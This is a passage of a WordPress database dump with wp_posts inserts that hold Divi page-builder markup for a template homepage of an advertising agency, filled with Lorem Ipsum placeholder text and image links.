button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 19:57:44','2020-08-07 19:57:44','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (574,1,'2020-08-07 19:58:13','2020-08-07 19:58:13','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#fcd21d\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Generating New Ideas. Solving Big Problems</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. 